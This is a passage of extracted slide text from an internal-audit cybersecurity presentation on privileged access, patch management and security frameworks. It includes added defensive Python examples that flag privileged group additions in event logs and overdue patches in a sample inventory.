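2019-03-04T10:05:00Z EventID=4729 Subject=CORP\\jsmith-adm Member=CORP\\svc-backup Group="Domain Admins"
2019-03-04T10:30:12Z EventID=4624 Subject=CORP\\svc-backup LogonType=3
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) EventID=(?P<event>\d+) Subject=(?P<subject>\S+)'
    r'(?: Member=(?P<member>\S+) Group="(?P<group>[^"]+)")?'
    r'(?: LogonType=(?P<logon>\d+))?'
)
GROUP_ADD_EVENTS = {"4728", "4732"}    # member added to a global / local security group
LOGON_EVENT = "4624"                   # successful logon
INTERACTIVE_LOGON_TYPES = {"2", "10"}  # console / Remote Desktop sessions


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def privileged_group_additions(log_text, privileged_groups=PRIVILEGED_GROUPS):
    """One alert per addition of a member to a privileged group (removals are not alerted)."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["event"] in GROUP_ADD_EVENTS and rec["group"] in privileged_groups:
            alerts.append({"time": rec["ts"], "by": rec["subject"],
                           "member": rec["member"], "group": rec["group"]})
    return alerts


def interactive_logons_by_privileged(log_text, privileged_accounts=PRIVILEGED_ACCOUNTS):
    """Interactive (console/RDP) logons by accounts that should only be used for admin work."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if (rec and rec["event"] == LOGON_EVENT
                and rec["logon"] in INTERACTIVE_LOGON_TYPES
                and rec["subject"] in privileged_accounts):
            hits.append({"time": rec["ts"], "account": rec["subject"], "logon_type": rec["logon"]})
    return hits


if __name__ == "__main__":
    for a in privileged_group_additions(SAMPLE_LOG):
        print(f"ALERT  {a['time']}: {a['by']} added {a['member']} to {a['group']}")
    for h in interactive_logons_by_privileged(SAMPLE_LOG):
        print(f"REVIEW {h['time']}: privileged account {h['account']} logged on interactively (type {h['logon_type']})")
```

For the audit question on the slide, the useful evidence is not the script itself but whether IT has something equivalent wired to its log source and whether the alerts reach a person who reviews them; running a check like this over a sample of the company's own exported logs is a quick way to test that.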
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
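An added example (not from the presentation) of turning the patch management bullets above into a testable audit check: given a constructed device inventory, vendor release dates and a risk-acceptance register, it reports overdue devices, separates those with a documented and unexpired acceptance from those with none, flags devices more than a year behind, reports devices with no vendor data at all (the "don't know all the devices" problem), and orders internet-facing devices first. All hostnames, products, versions, dates, the 30-day SLA and the cut-off date are invented sample values.

```python
"""Added example (not from the presentation): an audit check for the patch
management points above, run over a constructed device inventory, vendor patch
release dates and a risk-acceptance register. Hostnames, products, versions,
dates, the 30-day SLA and the cut-off date are invented sample values."""
from datetime import date, timedelta

AS_OF = date(2019, 3, 1)            # audit cut-off date (constructed)
OVERDUE_AFTER = timedelta(days=30)  # assumption: the company's patch SLA
ONE_YEAR = timedelta(days=365)      # slide: 99% of exploited vulnerabilities were over a year old

# Constructed vendor data: product -> (latest release identifier, release date)
LATEST = {
    "Windows Server 2016": ("2019-02 cumulative update", date(2019, 2, 12)),
    "Java 8":              ("8u201", date(2019, 1, 15)),
    "VMware ESXi 6.5":     ("6.5 U2", date(2018, 5, 3)),
    "Citrix NetScaler":    ("12.1 build 50", date(2017, 10, 29)),
    "Adobe Reader DC":     ("2019.010", date(2019, 2, 12)),
}

# Constructed inventory: (hostname, product, installed release, internet facing?)
INVENTORY = [
    ("web01",   "Windows Server 2016", "2019-02 cumulative update", True),
    ("app02",   "Java 8",              "8u161",                     False),
    ("esx01",   "VMware ESXi 6.5",     "6.5 U1",                    False),
    ("ns01",    "Citrix NetScaler",    "12.0 build 58",             True),
    ("wks-044", "Adobe Reader DC",     "2019.010",                  False),
    ("plc-07",  "Legacy HMI software", "3.2",                       False),
]

# Constructed risk-acceptance register: (hostname, product) -> acceptance expiry date
ACCEPTED_RISKS = {
    ("esx01", "VMware ESXi 6.5"): date(2019, 12, 31),  # accepted and still valid
    ("app02", "Java 8"):          date(2018, 12, 31),  # acceptance has lapsed
}


def patch_findings(inventory=INVENTORY, latest=LATEST, accepted=ACCEPTED_RISKS, as_of=AS_OF):
    """Classify every device as current, pending (inside the SLA), overdue,
    overdue_accepted (a valid, documented risk acceptance exists) or
    unknown_product (no vendor data, so the device cannot be assessed)."""
    findings = []
    for host, product, installed, internet_facing in inventory:
        finding = {"host": host, "product": product, "internet_facing": internet_facing}
        if product not in latest:
            finding["status"] = "unknown_product"
        elif installed == latest[product][0]:
            finding["status"] = "current"
        else:
            age = as_of - latest[product][1]          # how long the fix has been available
            finding["days_outstanding"] = age.days
            finding["older_than_year"] = age > ONE_YEAR
            if age <= OVERDUE_AFTER:
                finding["status"] = "pending"
            else:
                expiry = accepted.get((host, product))
                finding["status"] = "overdue_accepted" if expiry and expiry >= as_of else "overdue"
        findings.append(finding)
    return findings


def priority_order(findings):
    """Unaccepted overdue devices, internet-facing first, then oldest outstanding patch first."""
    overdue = [f for f in findings if f["status"] == "overdue"]
    return sorted(overdue, key=lambda f: (not f["internet_facing"], -f["days_outstanding"]))


if __name__ == "__main__":
    results = patch_findings()
    for f in results:
        print(f"{f['host']:8s} {f['status']:17s} {f.get('days_outstanding', '-')}")
    print("Remediate first:", [f["host"] for f in priority_order(results)])
```

Note how a lapsed acceptance is treated: the Java device had a documented acceptance, but it expired before the cut-off, so it is reported as plainly overdue. That is the point of the last bullet above: a risk acceptance only counts if management is still tracking it.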
CYBERSECURITY - SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored, and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters, and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal | mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates | stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal
Mobile: (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates
stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS